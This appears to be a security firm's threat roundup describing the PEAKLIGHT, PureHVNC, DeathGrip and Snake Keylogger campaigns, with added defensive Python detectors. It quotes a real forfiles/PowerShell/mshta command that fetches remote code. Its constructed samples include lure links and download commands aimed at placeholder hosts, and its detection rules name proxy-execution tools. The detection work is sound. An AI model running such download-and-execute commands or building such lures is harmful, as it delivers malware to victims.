The global cyber threat landscape remains highly elevated, with significant impacts on organizations of all sizes and sectors. Attackers relentlessly seek out vulnerable targets, many of which are in industries that have historically underinvested in cybersecurity defenses. As these malicious actors hone their strategies, the impact of each attack becomes more severe, especially as they set their sights on higher value targets.
The top four threats occurring over the past month were:
PEAKLIGHT: Decrypting Stealthy Memory-Only Malware
Mandiant has discovered a malware-as-a-service infostealer delivery campaign built around a memory-only dropper/downloader called “PEAKLIGHT.” Payloads include LUMMAC.V2, ShadowLadder, and CryptBot. What is notable is the initial vector: a .lnk shortcut file that pulls down an obfuscated JavaScript dropper which runs only in memory.
In most cases the chain begins with a manual user download, here a .zip file disguised as a pirated movie. The archive contains a .lnk shortcut posing as the movie file. In one variation, the shortcut’s argument string abuses the Microsoft utility forfiles.exe: it matches win.ini under C:\Windows and, for that match, runs a PowerShell command that in turn launches mshta against a remote URL. The executed command is forfiles.exe /p C:\Windows /m win.ini /c "powershell . mshta https://nextomax.b-cdn(.)net/nexto" (URL defanged). Windows Media Player then opens and plays a movie studio’s opening logo reel, a simple video.mp4 file. This appears intended to allay any concerns the victim may have about the nature of the download.
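The forfiles-to-PowerShell-to-mshta chain above is unusual enough to detect from process-creation telemetry alone. The following is an added example (not code from the original article or from Mandiant) showing three detection rules run over a handful of constructed process events: forfiles.exe whose /c command launches a script interpreter, PowerShell spawned by forfiles.exe, and mshta.exe given a remote URL. The event shape, PIDs and the URL are assumptions made for the example; only the forfiles /p ... /m ... /c pattern comes from the page.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str   # command line as recorded by the sensor


# Interpreters that rarely belong inside a forfiles /c command; forfiles is a
# signed Microsoft binary that will launch whatever /c names (proxy execution).
PROXIED_INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)\b",
    re.IGNORECASE,
)
FORFILES_CMD = re.compile(r"/c\s+(.*)$", re.IGNORECASE | re.DOTALL)
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, rule_name) pairs for events matching the PEAKLIGHT-style chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        # Rule 1: forfiles used as a proxy to launch a script interpreter.
        if name == "forfiles.exe":
            m = FORFILES_CMD.search(e.cmdline)
            if m and PROXIED_INTERPRETERS.search(m.group(1)):
                alerts.append((e.pid, "forfiles_proxy_exec"))
        # Rule 2: PowerShell whose parent is forfiles.exe (not a normal admin chain).
        if name in ("powershell.exe", "pwsh.exe") and parent_name == "forfiles.exe":
            alerts.append((e.pid, "powershell_child_of_forfiles"))
        # Rule 3: mshta fetching an HTA from a remote URL.
        if name == "mshta.exe" and REMOTE_URL.search(e.cmdline):
            alerts.append((e.pid, "mshta_remote_hta"))
    return alerts


# Constructed sample telemetry (not real events). PIDs 1000-1300 are the lure
# chain; PID 2000 is a benign log-rotation job that also uses forfiles /c.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\forfiles.exe",
              'forfiles.exe /p C:\\Windows /m win.ini /c "powershell . mshta https://cdn.example.invalid/nexto"'),
    ProcEvent(1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell . mshta https://cdn.example.invalid/nexto"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\mshta.exe",
              "mshta https://cdn.example.invalid/nexto"),
    ProcEvent(2000, 1900, r"C:\Windows\System32\forfiles.exe",
              'forfiles /p C:\\Logs /s /m *.log /d -30 /c "cmd /c del @path"'),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule fires independently, so a sensor that only records the PowerShell process (for instance because forfiles.exe exits too quickly) still yields rule 2, and the benign cleanup job, whose /c argument only runs cmd /c del, is not flagged.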
The JavaScript dropper runs only in memory, which lets it evade EDR solutions that rely on scanning files written to disk. Its strings are stored as decimal-encoded ASCII character codes assigned to randomly named variables; at run time these are converted back to characters with the String.fromCharCode() function before the decoded code is executed.
There are two variations of the payload: one hex encoded, the other Base64 encoded. In the hex variant the first-stage command is stored as a string of hex characters. The chain launches PowerShell quietly with -ep Unrestricted (so the execution policy does not block the script), uses a custom function to convert the hex string into a byte array, creates an AES decryptor with a second hex-encoded key, and decrypts the byte array to reveal the actual PowerShell command, which is then executed.
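The two preceding paragraphs describe string hiding an analyst meets constantly: decimal char-code arrays fed to String.fromCharCode(), followed by a hex-encoded stage. Below is an added example (written for this page, not the dropper’s own code or a Mandiant tool) of a small static deobfuscator that recovers those strings from a constructed JavaScript snippet, decodes any long hex blobs to bytes, and flags PowerShell switches in the result. The sample variable names, the char-code sequences and the 16-byte hex value are all constructed for the example; the AES decryption step itself is not reproduced here because it needs the key and ciphertext from a real sample.

```python
import re

# Three patterns used by such droppers: decimal arrays assigned to throwaway
# variables, direct String.fromCharCode(...) calls, and long hex strings that
# carry the next (AES-encrypted) stage or its key. The hex pattern insists on
# an even number of digits so bytes.fromhex() cannot fail.
DEC_ARRAY = re.compile(r"\b(\w+)\s*=\s*\[\s*([0-9,\s]+)\]")
FROM_CHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
HEX_STRING = re.compile(r"[\"']((?:[0-9A-Fa-f]{2}){8,})[\"']")

# Markers in the decoded text that tell an analyst what the next stage does.
SUSPICIOUS = {
    "execution_policy_override": re.compile(r"-e(?:p|xecutionpolicy)\s+(?:unrestricted|bypass)", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "base64_stage": re.compile(r"FromBase64String", re.I),
    "aes_stage": re.compile(r"CreateDecryptor|AesCryptoServiceProvider|AesManaged", re.I),
}


def _codes_to_text(codes: str) -> str:
    return "".join(chr(int(c)) for c in codes.split(",") if c.strip())


def decode_strings(js: str) -> list[str]:
    """Recover every string hidden as decimal char codes, in order of appearance."""
    found = []
    for m in DEC_ARRAY.finditer(js):
        found.append((m.start(), _codes_to_text(m.group(2))))
    for m in FROM_CHARCODE.finditer(js):
        found.append((m.start(), _codes_to_text(m.group(1))))
    return [text for _, text in sorted(found)]


def decode_hex_blobs(js: str) -> list[bytes]:
    return [bytes.fromhex(m.group(1)) for m in HEX_STRING.finditer(js)]


def deobfuscate(js: str) -> dict:
    strings = decode_strings(js)
    joined = "\n".join(strings)
    flags = [name for name, rx in SUSPICIOUS.items() if rx.search(joined)]
    return {"strings": strings, "hex_blobs": decode_hex_blobs(js), "flags": flags}


# Constructed sample in the style described above (not taken from a real dropper):
# "powershell", " -ep Unrestricted -nop", and a hex string decoding to "ABCDEFGHIJKLMNOP".
SAMPLE_JS = r'''
var zQx9 = [112,111,119,101,114,115,104,101,108,108];
var kLm2 = String.fromCharCode(32,45,101,112,32,85,110,114,101,115,116,114,105,99,116,101,100,32,45,110,111,112);
var hBv7 = "4142434445464748494a4b4c4d4e4f50";
'''

if __name__ == "__main__":
    result = deobfuscate(SAMPLE_JS)
    for s in result["strings"]:
        print("string:", repr(s))
    for blob in result["hex_blobs"]:
        print("hex blob:", blob)
    print("flags:", result["flags"])
```

Running the deobfuscator over a real sample gives the analyst the reassembled PowerShell command line plus the hex material that feeds the AES stage; the flags list is a quick triage signal for which switches and .NET crypto calls the next stage relies on.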
From here PEAKLIGHT itself executes. It is a PowerShell downloader that checks for hardcoded filenames and, if they are not present, downloads them to $env:AppData as L1.zip, L2.zip, and so on, then executes them in alphabetical order and also downloads the decoy video (video.mp4).
These final payloads are extracted to Setup.exe and to LiteSkinUtils.dll together with Bentonite.cfg respectively. Setup.exe is actually the CryptBot infostealer, Bentonite.cfg holds the malicious configuration for ShadowLadder, and LiteSkinUtils.dll is the library ShadowLadder loads via DLL sideloading. video.mp4 is a legitimate movie trailer used to keep the victim unsuspecting.
This campaign used numerous layers of obfuscation and evasion, highlighting the importance of defense in depth and of knowledge sharing between blue teams to counter such complex and evolving attacks.
PureHVNC
In April, FortiGuard Labs discovered a sophisticated attack campaign using multiple obfuscation and evasion techniques to distribute VenomRAT via ScrubCrypt. The attack did not stop with VenomRAT, as subsequent plugins continued to deploy various malware into victim environments.
Recently, a phishing campaign was discovered using a similar attack chain, targeting employees while posing as customers seeking services. The campaign used urgent messages to trick victims into opening malicious HTML attachments, launching a complex, multi-stage attack involving a variety of malware, including XWorm, Venom RAT, AsyncRAT, and PureHVNC. The malware in this campaign used advanced packing and obfuscation techniques, including the Python obfuscator “Kramer,” the shellcode generator “donut,” and the shellcode loader “laZzzy,” to evade detection.
The email tricks recipients into opening an HTML attachment that uses the Windows “search-ms” protocol to query for a remote LNK file displayed with a PDF icon. Once the LNK is executed, it runs an obfuscated batch file via conhost.exe that downloads additional malicious payloads, including a Python program that uses Base64 decoding, RC4 decryption, and shellcode execution to carry out the attack.
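The search-ms lure above works because the URI’s crumb=location: parameter can point Windows Explorer at an attacker-hosted share, so the “search results” the victim sees are files the attacker chose. As an added example (not code from the original article or from FortiGuard Labs), the following scanner pulls every search-ms: URI out of an HTML attachment, decodes the parameters, and reports whether the location is remote (a UNC path, commonly WebDAV via \\host@port\share) rather than a local folder. The HTML snippets, the 203.0.113.x addresses and the share names are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# A search-ms: URI is a list of key=value pairs; the lure points "crumb=location:"
# at an attacker-controlled share instead of a local folder.
SEARCH_MS_URI = re.compile(r"search-ms:[^\"'<>\s]+", re.IGNORECASE)
REMOTE_LOCATION = re.compile(r"^(?:\\\\|//|https?://)", re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split 'search-ms:k1=v1&k2=v2' into a dict with percent-encoding removed."""
    params = {}
    for part in uri.split(":", 1)[1].split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.lower()] = unquote(value)
    return params


def find_search_ms_lures(document: str) -> list[dict]:
    """Return every search-ms: URI in an HTML attachment with its decoded target."""
    findings = []
    # html.unescape() turns &amp; back into & so parameters split correctly.
    for m in SEARCH_MS_URI.finditer(html.unescape(document)):
        p = parse_search_ms(m.group(0))
        crumb = p.get("crumb", "")
        location = crumb.split(":", 1)[1] if crumb.lower().startswith("location:") else ""
        findings.append({
            "uri": m.group(0),
            "query": p.get("query", ""),
            "location": location,
            "displayname": p.get("displayname", ""),
            "remote": bool(REMOTE_LOCATION.match(location)),
        })
    return findings


# Constructed sample attachment (not a real lure): one link with percent-encoded
# UNC path, one JavaScript redirect with a literal UNC path pointing at port 80.
SAMPLE_LURE = r'''<html><body>
<p>Your invoice is ready: <a href="search-ms:query=invoice&amp;crumb=location:%5C%5C203.0.113.10%40443%5Cshare&amp;displayname=Invoices">Open</a></p>
<script>window.location.href = "search-ms:query=report&crumb=location:\\203.0.113.10@80\downloads&displayname=Downloads";</script>
</body></html>'''

# Constructed benign case: a search scoped to a local folder.
SAMPLE_BENIGN = r'''<a href="search-ms:query=budget&crumb=location:C:\Users\me\Documents&displayname=Documents">Search</a>'''

if __name__ == "__main__":
    for f in find_search_ms_lures(SAMPLE_LURE) + find_search_ms_lures(SAMPLE_BENIGN):
        verdict = "REMOTE" if f["remote"] else "local"
        print(f"{verdict}: query={f['query']!r} location={f['location']!r} shown as {f['displayname']!r}")
```

Mail gateways that cannot detonate HTML attachments can still apply this check statically: any search-ms: URI whose location is remote is worth quarantining, because legitimate mail has no reason to open an Explorer search against an outside host.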
The campaign also included a .NET application that decrypted and decompressed the payload using AES and Gzip. The malware communicated with a C2 server to gather victim information and targeted specific applications such as cryptocurrency wallets and password managers. Plugins such as “PluginRemoteDesktop” and “PluginExecuting” facilitated further attacks, including remote desktop access and the execution of additional malicious files.
Overall, this campaign demonstrates the use of complex, multi-layered obfuscation and public hacking tools to deploy a variety of malware to evade detection and target sensitive information within victim environments.
DeathGrip ransomware
The rise of DeathGrip ransomware reflects a disturbing trend in the cybersecurity sector: the barrier to entry for cybercriminals is falling. Launched in June 2024, DeathGrip operates as a Ransomware-as-a-Service (RaaS), providing ready-made ransomware builders, such as those derived from LockBit 3.0 and Yashma/Chaos, to a wide range of users on the dark web. The service makes it possible for anyone with little technical expertise to carry out ransomware attacks, contributing to the commoditization of ransomware.
DeathGrip’s operations are heavily promoted through Telegram and underground forums, and it has quickly gained notoriety in the cybercrime community. The ransomware is distributed via self-extracting WinRAR bundles that retrieve and execute a payload from a remote server. These payloads encrypt files with AES-256-GCM and are built with evasion techniques, including UAC bypass and anti-debugging countermeasures, making them difficult to detect and recover from.
DeathGrip’s ransom demands are relatively low, typically in the $100 to $1,000 range, suggesting a strategy focused on mass victimization rather than targeting high-value organizations. This model has already caused significant disruption, including an attack on Indonesia’s national data center.
The widespread availability of these tools has democratized access to ransomware, allowing smaller threat actors to carry out attacks previously limited to more sophisticated groups. As these tools become more accessible, the frequency and impact of ransomware attacks are expected to increase, creating greater challenges for cybersecurity defenses. Enterprises need to plan defenses that can detect and mitigate the techniques associated with DeathGrip ransomware.
Snake keylogger distributed via phishing campaigns
Fortinet’s FortiGuard Labs recently identified a phishing campaign in which malicious Excel documents attached to emails delivered a new variant of Snake Keylogger. Snake Keylogger, also known as the “404 Keylogger” or “KrakenKeylogger,” is a .NET-based subscription keylogger originally sold on hacker forums. It is capable of stealing sensitive data, logging keystrokes, and capturing screenshots on victims’ computers.
The phishing email tricks the recipient into opening a malicious Excel document that downloads and executes the Snake Keylogger, using anti-analysis techniques along the way to avoid detection. Decoded JavaScript code then downloads and runs an executable (sahost.exe) that extracts, decrypts, loads, and executes the keylogger, relying on multiple layers of protection to evade security products.
The loader module (sahost.exe) employs several methods to protect the core keylogger module, including transformation of the module, encryption, and process hollowing (starting a legitimate process in a suspended state, replacing its in-memory image with the malicious code, and resuming it so the payload runs under the legitimate process’s name).
Snake Keylogger’s core module therefore never runs under its own name and is capable of collecting many types of personal and sensitive information, including saved credentials, keystrokes, screenshots, and clipboard data.
Credentials harvested from over 50 software programs are sent to the attackers via SMTP, revealing the keylogger’s extensive data-stealing capabilities.
This is another example of how a company is only as strong as its weakest link. Before clicking any link in an email, verify that it is legitimate by hovering over it and reading the actual URL. And if you come across a potential phishing email, report it: you are probably not the only one who has received it.
If you are facing challenges related to cybersecurity threats, breaches, or malicious actors, or would like to learn more about identifying potential threats to your organization, contact Marcum Technology today.